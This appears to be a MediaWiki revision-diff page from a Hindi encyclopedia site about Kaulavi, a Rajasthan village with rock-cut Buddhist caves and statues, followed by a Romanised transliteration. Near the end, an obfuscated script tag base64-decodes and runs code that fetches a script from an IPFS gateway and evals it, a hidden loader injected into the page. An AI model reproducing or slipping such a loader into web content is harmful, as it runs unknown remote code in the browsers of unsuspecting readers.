Difference between revisions of "कौलवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "छः" to "छह")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*कौलवी [[राजस्थान]] के झालावाड़ ज़िले के निकट एक ग्राम के रूप में विद्यमान है,जो बौद्ध विहार के लिए प्रसिद्ध है।  
+
'''कौलवी''' [[राजस्थान]] के [[झालावाड़ ज़िला|झालावाड़ ज़िले]] के निकट एक ग्राम के रूप में विद्यमान है, जो बौद्ध विहार के लिए प्रसिद्ध है।  
 
*इन विहारों के निर्माण काल के बारे में मतैक्य नहीं है।  
 
*इन विहारों के निर्माण काल के बारे में मतैक्य नहीं है।  
 
*सम्भवतः इनका निर्माण काल [[विक्रम सम्वत]] 500 से 700 के मध्य माना गया है।  
 
*सम्भवतः इनका निर्माण काल [[विक्रम सम्वत]] 500 से 700 के मध्य माना गया है।  
Line 7: Line 7:
 
*इस प्रतिमा का [[मस्तिष्क|मस्तक]] नहीं हैं।  
 
*इस प्रतिमा का [[मस्तिष्क|मस्तक]] नहीं हैं।  
 
*पास में चट्टान काटकर ही दो स्तम्भों पर एक छोटा-सा मण्डप स्थापित किया गया है।  
 
*पास में चट्टान काटकर ही दो स्तम्भों पर एक छोटा-सा मण्डप स्थापित किया गया है।  
*द्वार से प्रविष्ट होते समय बायीं ओर लगभग छः फुट लम्बा, चार फुट ऊँचा, ढाई फुट चौड़ा दीवार से सटा हुआ एक चबूतरा बना हुआ है।  
+
*द्वार से प्रविष्ट होते समय बायीं ओर लगभग छह फुट लम्बा, चार फुट ऊँचा, ढाई फुट चौड़ा दीवार से सटा हुआ एक चबूतरा बना हुआ है।  
 
*यहाँ मिले मन्दिर के गर्भगृह में एक पद्मासन प्रतिमा उत्कीर्ण की गई है, जिसके मस्तक के अतिरिक्त मुँह, [[कान]], [[नाक]] आदि का पता नहीं लगता।  
 
*यहाँ मिले मन्दिर के गर्भगृह में एक पद्मासन प्रतिमा उत्कीर्ण की गई है, जिसके मस्तक के अतिरिक्त मुँह, [[कान]], [[नाक]] आदि का पता नहीं लगता।  
 
*मुद्रा से यह भगवान [[बुद्ध]] की प्रतिमा लगती है।  
 
*मुद्रा से यह भगवान [[बुद्ध]] की प्रतिमा लगती है।  
Line 15: Line 15:
 
*कौलवी स्थान से अब तक प्राप्त साक्ष्यों के आधार पर इन्हें [[बौद्ध धर्म]] की तांत्रिक शाखा द्वारा निर्मित माना गया है।  
 
*कौलवी स्थान से अब तक प्राप्त साक्ष्यों के आधार पर इन्हें [[बौद्ध धर्म]] की तांत्रिक शाखा द्वारा निर्मित माना गया है।  
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के ऐतिहासिक स्थान}}
 
{{राजस्थान के ऐतिहासिक स्थान}}
{{राजस्थान के पर्यटन स्थल}}
 
[[Category:नया पन्ना]]
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:राजस्थान के पर्यटन स्थल]]
 
[[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 11:16, 9 February 2021

kaulavi rajasthan ke jhalava d zile ke nikat ek gram ke roop mean vidyaman hai, jo bauddh vihar ke lie prasiddh hai.

  • in viharoan ke nirman kal ke bare mean mataiky nahian hai.
  • sambhavatah inaka nirman kal vikram samvat 500 se 700 ke madhy mana gaya hai.
  • kaulavi ki gufaean paha di par sthit haian.
  • paha di par jane ke lie chattanean katakar sidhiyaan banaee gee haian.
  • yahaan par ek daityakar chattan ko katakar gumbad banaya gaya hai, jisake niche tarashi huee pratima utkirn ki gee hai.
  • is pratima ka mastak nahian haian.
  • pas mean chattan katakar hi do stambhoan par ek chhota-sa mandap sthapit kiya gaya hai.
  • dvar se pravisht hote samay bayian or lagabhag chhah phut lamba, char phut ooancha, dhaee phut chau da divar se sata hua ek chabootara bana hua hai.
  • yahaan mile mandir ke garbhagrih mean ek padmasan pratima utkirn ki gee hai, jisake mastak ke atirikt muanh, kan, nak adi ka pata nahian lagata.
  • mudra se yah bhagavan buddh ki pratima lagati hai.
  • ek shilakhand ko gumbadakar mandir ki tarah tarasha gaya hai aur usamean ek buddh pratima utkirn ki gee pratit hoti hai, jo padmasin hai aur any pratimaoan ki bhaanti aspasht hai.
  • pas mean ek any shilakhand ko katakar 35-40 stambh tarashe gaye haian.
  • is vihar ke bare mean abhi yah nishchit nahian kiya gaya hai ki isaka nirman kis dharm ke logoan ne kiya tha.
  • kaulavi sthan se ab tak prapt sakshyoan ke adhar par inhean bauddh dharm ki taantrik shakha dvara nirmit mana gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh